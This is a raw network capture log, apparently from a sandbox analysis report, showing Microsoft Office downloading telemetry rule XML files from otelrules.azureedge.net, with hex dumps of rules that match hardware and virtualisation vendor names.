2024-11-04 16:31:36 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:36 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: d55876ee-301e-0099-5603-2d6683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163136Z-16547b76f7f22sh5hC1DFWyb4w00000003t000000000h3wy x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:36 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.5	49785	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:36 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:37 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:37 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: d30dfb3e-b01e-003e-7f5c-2e8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163137Z-176bd8f9bc5pzj8phC1DFWsz3000000005r0000000006nq9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:37 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.5	49786	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:36 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:37 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:37 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: c70a6fb1-401e-000a-3458-2e4a7b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163137Z-r159446fcd7n6v7whC1DFWauh800000004tg000000006d4u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:37 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.5	49784	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:37 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:37 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:37 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: d30de13e-b01e-003e-435c-2e8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163137Z-176bd8f9bc585r8thC1DFW1vw0000000055g00000000er7e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:37 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.5	49788	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:37 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:37 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:37 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: 7c58c81c-301e-0052-3c61-2e65d6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163137Z-15869dbbcc6lq2lzhC1DFWsurc00000003rg00000000bhvc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:37 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.5	49787	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:37 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:37 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:37 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 2f2a95d3-901e-00ac-5b08-2cb69e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163137Z-16547b76f7f775p5hC1DFWzdvn00000003sg00000000se7b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:37 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.5	49789	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:38 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:38 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:38 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: ea775dbe-901e-0016-4f03-2defe9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163138Z-16547b76f7fj897nhC1DFWdwq400000003qg00000000kn50 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:38 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.5	49733	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:38 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:38 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:38 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: c0039004-a01e-0070-7e5f-2e573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163138Z-15869dbbcc6x4rp4hC1DFW3t7w00000003t000000000g8k8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-04 16:31:38 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.5	49790	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:38 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:38 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:38 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 86fb44b9-501e-0078-06d2-2c06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163138Z-16547b76f7f7jnp2hC1DFWfc3000000003yg00000000bpt7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:38 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.5	49791	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:38 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:39 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:38 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: 4b06b021-701e-000d-6755-2e6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163138Z-176bd8f9bc56k8bfhC1DFW8xdg00000000p000000000arhd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:39 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.5	49792	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:38 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:39 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:38 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: 898dd9bc-901e-0048-53d2-2cb800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163138Z-16547b76f7f775p5hC1DFWzdvn00000003ug00000000m71c x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:39 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.5	49793	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:39 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:39 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:39 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 07c90e24-501e-007b-7e5c-2e5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163139Z-r159446fcd75mmzxhC1DFW9r5800000004r0000000008ka5 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:39 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C 